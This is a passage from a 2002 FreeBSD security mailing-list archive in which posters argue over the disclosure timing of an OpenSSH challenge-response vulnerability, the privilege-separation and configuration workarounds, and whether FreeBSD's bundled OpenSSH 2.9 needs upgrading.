wrote: >Mike: > >It is clear that Theo was attempting to have people apply the workaround >which had the least chance of revealing the nature of the bug in advance, >lest it be discovered by others and exploited. > >It's truly sad that ISS, which knew about Theo's advisory, released this >information today, instead of next week as Theo asked them to. If Theo's >roadmap for disclosure had been followed, more administrators could have >been informed about the bug, and they would have had time to take >preventive measures through the weekend before the skript kiddies began >their race to exploit the bug. Now, the race has begun. In fact, the >problem has been exacerbated because administrators who *could* have >secured their systems thought they'd have time to do so over the weekend. > >Theo made a worthy attempt to minimize harm (which should be the goal of >any security policy). It's a shame that ISS sought the spotlight instead >of doing the same. > >--Brett Glass > >At 09:10 AM 6/26/2002, Mike Tancsa wrote: > > >>Also, the ISS advisory states >> >>"Administrators can remove this vulnerability by disabling the >>Challenge-Response authentication parameter within the OpenSSH daemon >>configuration file. This filename and path is typically: >>/etc/ssh/sshd_config. To disable this parameter, locate the corresponding >>line and change it to the line below: ChallengeResponseAuthentication no " >> >>This would imply there is a work around, but the talk before hand >> >>----quote from Message-Id: <200206242327.g5ONRBLI012690@cvs.openbsd.org>--- >> >>Bullshit. >> >>You have been told to move up to privsep so that you are immunized by >>the time the bug is released. >> >>If you fail to immunize your users, then the best you can do is tell >>them to disable OpenSSH until 3.4 is out early next week with the >>bugfix in it. Of course, then the bug will be public. >>----end-quote--- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:51:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from scribble.fsn.hu (scribble.fsn.hu [193.224.40.95]) by hub.freebsd.org (Postfix) with SMTP id ABD8A37B400 for ; Wed, 26 Jun 2002 09:51:12 -0700 (PDT) Received: (qmail 21558 invoked by uid 1000); 26 Jun 2002 16:51:11 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 26 Jun 2002 16:51:11 -0000 Date: Wed, 26 Jun 2002 18:51:11 +0200 (CEST) From: Attila Nagy To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) In-Reply-To: <4.3.2.7.2.20020626103956.02291aa0@localhost> Message-ID: References: <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> <4.3.2.7.2.20020626103956.02291aa0@localhost> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, > >As for the start of the race? It started the minute Theo's notice hit > >bugtraq. > No, it didn't. The skript kiddies didn't know where the bug was. Correct me, if I'm wrong, but people, called "script kiddies" can't really code. They just use tools (scripts) from other people. Of course there are crackers (black hats if you wish), for whom this information could be useable. > He DID say to use PrivSep. He did not say to disable > ChallengeResponseAuthentication for a reason: it would have clued the > kiddies into the location of the bug. Ppl, before you are going crazy, think a little. Theo did you a favor when he released his letter. Why? Because now all of you are using privsep, which will hopefully help you if the another 100 exploits will be released/found in OpenSSH... This is what they call "proactive security" :) --------[ Free Software ISOs - ftp://ftp.fsn.hu/pub/CDROM-Images/ ]------- Attila Nagy e-mail: Attila.Nagy@fsn.hu Free Software Network (FSN.HU) phone @work: +361 210 1415 (194) cell.: +3630 306 6758 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:57:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id B685837B401 for ; Wed, 26 Jun 2002 09:57:07 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA12004; Wed, 26 Jun 2002 10:56:57 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626105413.02275240@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 10:56:46 -0600 To: Attila Nagy From: Brett Glass Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <4.3.2.7.2.20020626103956.02291aa0@localhost> <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> <4.3.2.7.2.20020626103956.02291aa0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:51 AM 6/26/2002, Attila Nagy wrote: >Correct me, if I'm wrong, but people, called "script kiddies" can't really >code. Some of them can. They share their scripts with the others. >Ppl, before you are going crazy, think a little. >Theo did you a favor when he released his letter. Why? Because now all of >you are using privsep, Alas, Theo's letter said that people had until July 1 to implement PrivSep before the details of the bug were revealed. Since many admins can't take whole farms of production machines down during the week, I know of several who were planning to implement PrivSep this coming weekend. The early announcement by ISS has put them and their organizations at risk. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 10: 4:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 4BF5737B401 for ; Wed, 26 Jun 2002 10:04:09 -0700 (PDT) Received: from famine.cs.utah.edu (famine.cs.utah.edu [155.99.198.114]) by wrath.cs.utah.edu (8.11.6/8.11.6) with ESMTP id g5QH48L23375; Wed, 26 Jun 2002 11:04:08 -0600 (MDT) Received: by famine.cs.utah.edu (Postfix, from userid 2146) id 0CE1523AA8; Wed, 26 Jun 2002 11:04:07 -0600 (MDT) Date: Wed, 26 Jun 2002 11:04:07 -0600 From: "David G . Andersen" To: Brett Glass Cc: Attila Nagy , freebsd-security@FreeBSD.ORG Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Message-ID: <20020626110407.B22168@cs.utah.edu> References: <4.3.2.7.2.20020626103956.02291aa0@localhost> <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> <4.3.2.7.2.20020626103956.02291aa0@localhost> <4.3.2.7.2.20020626105413.02275240@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <4.3.2.7.2.20020626105413.02275240@localhost>; from brett@lariat.org on Wed, Jun 26, 2002 at 10:56:46AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett Glass just mooed: > > >Ppl, before you are going crazy, think a little. > >Theo did you a favor when he released his letter. Why? Because now all of > >you are using privsep, > > Alas, Theo's letter said that people had until July 1 to implement > PrivSep before the details of the bug were revealed. Since many admins > can't take whole farms of production machines down during the week, I know > of several who were planning to implement PrivSep this coming weekend. > The early announcement by ISS has put them and their organizations at risk. bullshit. there's a one line workaround for this bug. If this were something that actually required an immediate major version upgrade, then Theo's handling of it would have been good. But with a one-line configuration file change that can fix things until admins have time to test and deploy a hugely new ssh version, his actions were beyond stupid. -dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 10:10:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from hellfire.hexdump.org (h006097e24f05.ne.client2.attbi.com [66.30.26.90]) by hub.freebsd.org (Postfix) with ESMTP id 2668737B448 for ; Wed, 26 Jun 2002 10:08:23 -0700 (PDT) Received: from hellfire.hexdump.org (localhost [127.0.0.1]) by hellfire.hexdump.org (8.12.2/8.12.2) with ESMTP id g5QHGdg5012472; Wed, 26 Jun 2002 13:16:39 -0400 (EDT) (envelope-from freebsd@hexdump.org) Received: from localhost (freebsd@localhost) by hellfire.hexdump.org (8.12.2/8.12.2/Submit) with ESMTP id g5QHGcua012469; Wed, 26 Jun 2002 13:16:38 -0400 (EDT) Date: Wed, 26 Jun 2002 13:16:38 -0400 (EDT) From: Jeff Gentry To: Kevin Golding Cc: "H. Wade Minter" , Subject: Re: Much ado about nothing. In-Reply-To: Message-ID: <20020626131608.W12444-100000@hellfire.hexdump.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Jacques has confirmed that the 2.9 which most people are (were?) running > wasn't even vulnerable anyway. Does this include RELENG_4? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 10:12:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.22.40]) by hub.freebsd.org (Postfix) with ESMTP id 8541537B59E for ; Wed, 26 Jun 2002 10:11:09 -0700 (PDT) Received: from [128.113.24.47] (gilead.netel.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.12.1/8.12.1) with ESMTP id g5QHB4bh041628; Wed, 26 Jun 2002 13:11:04 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <20020626110407.B22168@cs.utah.edu> References: <4.3.2.7.2.20020626103956.02291aa0@localhost> <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> <4.3.2.7.2.20020626103956.02291aa0@localhost> <4.3.2.7.2.20020626105413.02275240@localhost> <20020626110407.B22168@cs.utah.edu> Date: Wed, 26 Jun 2002 13:11:03 -0400 To: "David G . Andersen" , Brett Glass From: Garance A Drosihn Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Cc: Attila Nagy , freebsd-security@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: MIMEDefang 2.3 (www dot roaringpenguin dot com slash mimedefang) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:04 AM -0600 6/26/02, David G . Andersen wrote: > bullshit. there's a one line workaround for this bug. For you, it's a one-line workaround. That workaround is not available to everyone. The problem is there was no way to give you the information that would have been helpful to you, without also giving "helpful" information to people who might want to break into other people's machines. This wasn't a fun experience for anyone, but I'm not sure how to deal with such remote-hole exploits in a painless way. But mainly, could we not argue this on the freebsd-security mailing list? You're just adding "chat noise" to a list which was intended to be low-volume and high-info. Please? Everyone? -- Garance Alistair Drosehn = gad@gilead.netel.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 10:14:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by hub.freebsd.org (Postfix) with ESMTP id 30A7237B61A for ; Wed, 26 Jun 2002 10:11:16 -0700 (PDT) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 505714DF8 for ; Wed, 26 Jun 2002 12:11:15 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g5QHB9t00396; Wed, 26 Jun 2002 12:11:09 -0500 (CDT) (envelope-from hawkeyd) Date: Wed, 26 Jun 2002 12:11:09 -0500 (CDT) Message-Id: <200206261711.g5QHB9t00396@sheol.localdomain> Mime-Version: 1.0 X-Newsreader: knews 1.0b.1 Reply-To: hawkeyd@visi.com Organization: if (!FIFO) if (!LIFO) break; References: In-Reply-To: From: hawkeyd@visi.com (D J Hawkey Jr) Subject: NUTS! "Much ado about nothing" -- I need a clearer up or down X-Original-Newsgroups: sol.lists.freebsd.security To: freebsd-security@freebsd.org Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Nuts!" to me, not you. I accidentally posted the following to Usenet, instead of mailing "freebsd-security@". Sorry. ---8<--- Sorry to be so thick-headed, but between Mike and Jacques, the answer to "Is 'OpenSSH_2.9 FreeBSD localisations 20020307' even vulnerable?" is "That does appear to be the case.". No slight to Jacques, Theo, or ANYONE else, but does that mean a the answer is a simple "No."? I understand Jacques to be The Man(tm) for Things Of This Nature(tm). Thanks, Dave PS, Is that "No, it's vulnerable."?, or is that... OH, SHUT UP! --->8--- Dave Windows: "Where do you want to go today?" Linux: "Where do you want to go tomorrow?" FreeBSD: "Are you guys coming, or what?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 10:17: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mailer.cia-g.com (mailer.cia-g.com [65.100.115.10]) by hub.freebsd.org (Postfix) with ESMTP id D244437B697 for ; Wed, 26 Jun 2002 10:14:52 -0700 (PDT) Received: from cygnus.cia-g.com (data.cia-g.com [65.100.119.165]) by mailer.cia-g.com (Postfix) with ESMTP id 922D034D9 for ; Wed, 26 Jun 2002 11:31:53 -0600 (MDT) Received: from raz by cygnus.cia-g.com with local (Exim 3.12 #1 (Debian)) id 17NGNX-0002lE-00 for ; Wed, 26 Jun 2002 11:14:51 -0600 Date: Wed, 26 Jun 2002 11:14:51 -0600 From: David Wilk To: freebsd-security@freebsd.org Subject: Re: Viruses attaahce to emails in this mailing list Message-ID: <20020626111451.A10404@cygnus.wks.Gallup.cia-g.com> Mail-Followup-To: David Wilk , freebsd-security@freebsd.org References: <028001c21d05$d9c0d310$8c97d8c1@tele2unixgurun> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <028001c21d05$d9c0d310$8c97d8c1@tele2unixgurun>; from olofson@dax.net on Wed, Jun 26, 2002 at 01:37:23PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Beware us from self-proclaimed 'UnixGurus' sending mail from Outlook Express... On Wed, Jun 26, 2002 at 01:37:23PM +0200 or thereabouts, Haakan Olofsson wrote: > damnit > > cant you block attachments in this mailinglist, im getting tired of getting > virii's in the mail > > > Regards > > Olofson > > Beware us from the LiNUX penguin!!!! > > , , > /( )` Olofson > \ \___ / | SystemEngineer/UnixGuru > /- _ `-/ ' > (/\/ \ \ /\ > / / | ` \ > O O ) / | > `-^--'`< ' > (_.) _ ) / > `.___/` / > `-----' / > <----. __ / __ \ > <----|====O)))==) \) /==== > <----' `--' `.__,' \ olofson@dax.net > | | > \ / > ______( (_ / \_____ > ,' ,-----' | \ > `--{__________) \/ > > `--{__________) \/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ******************************* David Wilk System Administrator Community Internet Access, Inc. admin@cia-g.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 10:22:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from tartarus.telenet-ops.be (tartarus.telenet-ops.be [195.130.132.34]) by hub.freebsd.org (Postfix) with ESMTP id AAB9F37B7D1 for ; Wed, 26 Jun 2002 10:20:56 -0700 (PDT) Received: from localhost (localhost.localdomain [127.0.0.1]) by tartarus.telenet-ops.be (Postfix) with SMTP id 56447DCE86; Wed, 26 Jun 2002 19:20:55 +0200 (CEST) Received: from fortuna.home.paeps.cx (D576232A.kabel.telenet.be [213.118.35.42]) by tartarus.telenet-ops.be (Postfix) with ESMTP id AF844DCE85; Wed, 26 Jun 2002 19:20:49 +0200 (CEST) Received: from juno.home.paeps.cx (juno [10.0.0.2]) by fortuna.home.paeps.cx (Postfix) with ESMTP id 85F509B9; Wed, 26 Jun 2002 19:20:49 +0200 (CEST) Received: by juno.home.paeps.cx (Postfix, from userid 1001) id 7F360646; Wed, 26 Jun 2002 19:20:45 +0200 (CEST) Date: Wed, 26 Jun 2002 19:20:45 +0200 From: Philip Paeps To: Jeff Gentry Cc: Kevin Golding , "H. Wade Minter" , freebsd-security@FreeBSD.ORG Subject: Re: Much ado about nothing. Message-ID: <20020626172045.GQ96435@juno.paeps.cx> Mail-Followup-To: Jeff Gentry , Kevin Golding , "H. Wade Minter" , freebsd-security@FreeBSD.ORG References: <20020626131608.W12444-100000@hellfire.hexdump.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-15 Content-Disposition: inline In-Reply-To: <20020626131608.W12444-100000@hellfire.hexdump.org> X-Message-Flag: Get yourself a real mail client. Try Mutt: User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 2002-06-26 19:10:24, Jeff Gentry wrote: > > Jacques has confirmed that the 2.9 which most people are (were?) running > > wasn't even vulnerable anyway. > > Does this include RELENG_4? Yes. RELENG_4 is still using 2.9 (it was yesterday when I last cvsupped, anyway). I think people are moving it forward to 3.4 though. - Philip -- Philip Paeps philip@paeps.cx http://www.paeps.cx/ +32 486 114 720 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 10:27:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from tesla.distributel.net (nat.MTL.distributel.NET [66.38.181.24]) by hub.freebsd.org (Postfix) with ESMTP id 47E2737B4B2 for ; Wed, 26 Jun 2002 10:27:43 -0700 (PDT) Received: (from bmilekic@localhost) by tesla.distributel.net (8.11.6/8.11.6) id g5QHOGl42385; Wed, 26 Jun 2002 13:24:16 -0400 (EDT) (envelope-from bmilekic@unixdaemons.com) Date: Wed, 26 Jun 2002 13:24:16 -0400 From: Bosko Milekic To: Brett Glass Cc: Mike Tancsa , Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Message-ID: <20020626132416.A42340@unixdaemons.com> References: <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <4.3.2.7.2.20020626101626.02274c80@localhost>; from brett@lariat.org on Wed, Jun 26, 2002 at 10:23:14AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 10:23:14AM -0600, Brett Glass wrote: > Mike: > > It is clear that Theo was attempting to have people apply the workaround > which had the least chance of revealing the nature of the bug in advance, > lest it be discovered by others and exploited. > > It's truly sad that ISS, which knew about Theo's advisory, released this > information today, instead of next week as Theo asked them to. If Theo's > roadmap for disclosure had been followed, more administrators could have > been informed about the bug, and they would have had time to take > preventive measures through the weekend before the skript kiddies began > their race to exploit the bug. Now, the race has begun. In fact, the > problem has been exacerbated because administrators who *could* have > secured their systems thought they'd have time to do so over the weekend. > > Theo made a worthy attempt to minimize harm (which should be the goal of > any security policy). It's a shame that ISS sought the spotlight instead > of doing the same. > > --Brett Glass I think that what you're saying is reasonable, however, I know (now almost for a fact) that there was an exploit going around already. So, it's better than the information has been released sooner, than later. And, since it appears that the OpenSSH that ships with our -STABLE is not affected, all the easier this is for those of us who were in the middle of implementing "drastic measures" (for fear of the worst), as it allows us to step back, relax, and enjoy the fireworks. -Bosko To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 10:40:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id D949B37B405 for ; Wed, 26 Jun 2002 10:40:12 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5QHf3LI027927 for ; Wed, 26 Jun 2002 11:41:03 -0600 (MDT) Message-Id: <200206261741.g5QHf3LI027927@cvs.openbsd.org> To: freebsd-security@freebsd.org Subject: Wow Date: Wed, 26 Jun 2002 11:41:03 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Man, you guys sure do talk shit a lot. But anyways, that is hardly surprising or news. I do have a question though. Did any of you get broken in via this hole yet? Please, someone stand up and tell me they did. Maybe I'll come back tomorrow and ask the same question. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 10:47:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from bastet.rfc822.net (bastet.rfc822.net [64.81.113.233]) by hub.freebsd.org (Postfix) with ESMTP id 7DB1C37B400 for ; Wed, 26 Jun 2002 10:47:11 -0700 (PDT) Received: by bastet.rfc822.net (Postfix, from userid 1001) id A24669FD38; Wed, 26 Jun 2002 12:47:11 -0500 (CDT) Date: Wed, 26 Jun 2002 12:47:11 -0500 From: Pete Ehlke To: freebsd-security@FreeBSD.ORG Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Message-ID: <20020626174711.GB89844@rfc822.net> References: <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020626101626.02274c80@localhost> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 10:23:14AM -0600, Brett Glass wrote: > Mike: > > It is clear that Theo was attempting to have people apply the workaround > which had the least chance of revealing the nature of the bug in advance, > lest it be discovered by others and exploited. > > It's truly sad that ISS, which knew about Theo's advisory, released this > information today, instead of next week as Theo asked them to. If Theo's > roadmap for disclosure had been followed, more administrators could have > been informed about the bug, and they would have had time to take > preventive measures through the weekend before the skript kiddies began > their race to exploit the bug. Now, the race has begun. In fact, the > problem has been exacerbated because administrators who *could* have > secured their systems thought they'd have time to do so over the weekend. > ISS have claimed to me in private mail that Bugtraq sat on the advisory for some 30 hours, and that during that 30 hour period, ISS and the openssh team, specifically including Theo, agreed to bring forward the announcement date. Given the timing of the initial announcement's appearance on various lists, I'm inclined to believe them about the first part of that claim. The second part, especially given ISS' history of appearing to be more concerned with being first to market with advisories than with responsible vendor notification, is open to fairly serious debate until Theo or someone else from openssh comments. Given the pace of events this week, though, it's certainly not out of the question. But then, none of this belongs on -security, anyway ;) -P. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11: 1:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 8B2AE37B405 for ; Wed, 26 Jun 2002 11:01:46 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA13019; Wed, 26 Jun 2002 12:01:38 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626115517.022108b0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 12:01:29 -0600 To: Bosko Milekic From: Brett Glass Subject: Users of FreeBSD releases should upgrade OpenSSH too (Was: The "race" that Theo sought to avoid...) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020626132416.A42340@unixdaemons.com> References: <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:24 AM 6/26/2002, Bosko Milekic wrote: > I think that what you're saying is reasonable, however, I know (now > almost for a fact) that there was an exploit going around already. In that case, the correct thing to do would have been to warn that turning on Privilege Separation was urgent because the bug was being exploited. That way, people who had planned upgrades for the weekend would not have been blindsided. > So, > it's better than the information has been released sooner, than later. > And, since it appears that the OpenSSH that ships with our -STABLE is > not affected, all the easier this is for those of us who were in the > middle of implementing "drastic measures" (for fear of the worst), as > it allows us to step back, relax, and enjoy the fireworks. Don't do that. When the OpenSSH team fixed the bug that ISS found, it also nuked some other bugs. Some of these may have been present in 2.9, and they'll now be obvious to black hats. (Nice, clean, color-coded diffs that can be generated automatically via the CVS Web interface.) So, users of FreeBSD releases (or -STABLE, -CURRENT, or release engineering snapshots) should not rest easy. An upgrade to 3.4 is mandatory for everyone. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:16:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from theinternet.com.au (c16543.carlnfd1.nsw.optusnet.com.au [210.49.135.162]) by hub.freebsd.org (Postfix) with ESMTP id DCC5C37B400 for ; Wed, 26 Jun 2002 11:16:27 -0700 (PDT) Received: (from akm@localhost) by theinternet.com.au (8.11.6/8.11.4) id g5QIFev66985; Thu, 27 Jun 2002 04:15:40 +1000 (EST) (envelope-from akm) Date: Thu, 27 Jun 2002 04:15:40 +1000 From: Andrew Kenneth Milton To: Brett Glass Cc: Bosko Milekic , freebsd-security@FreeBSD.ORG Subject: Re: Users of FreeBSD releases should upgrade OpenSSH too (Was: The "race" that Theo sought to avoid...) Message-ID: <20020627041540.U89115@zeus.theinternet.com.au> References: <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> <20020626132416.A42340@unixdaemons.com> <4.3.2.7.2.20020626115517.022108b0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <4.3.2.7.2.20020626115517.022108b0@localhost>; from brett@lariat.org on Wed, Jun 26, 2002 at 12:01:29PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org +-------[ Brett Glass ]---------------------- | engineering snapshots) should not rest easy. An upgrade to 3.4 is | mandatory for everyone. Au contraire. An upgrade to 3.4 is mandatory iff a security advisory is released by the freebsd-security team indicating it is. Not because you say it is. -- Totally Holistic Enterprises Internet| | Andrew Milton The Internet (Aust) Pty Ltd | M:+61 416 022 411 | ACN: 082 081 472 ABN: 83 082 081 472 |akm@theinternet.com.au| Carpe Daemon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 11:21: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from sm13.texas.rr.com (sm13.texas.rr.com [24.93.35.40]) by hub.freebsd.org (Postfix) with ESMTP id A206137B40E for ; Wed, 26 Jun 2002 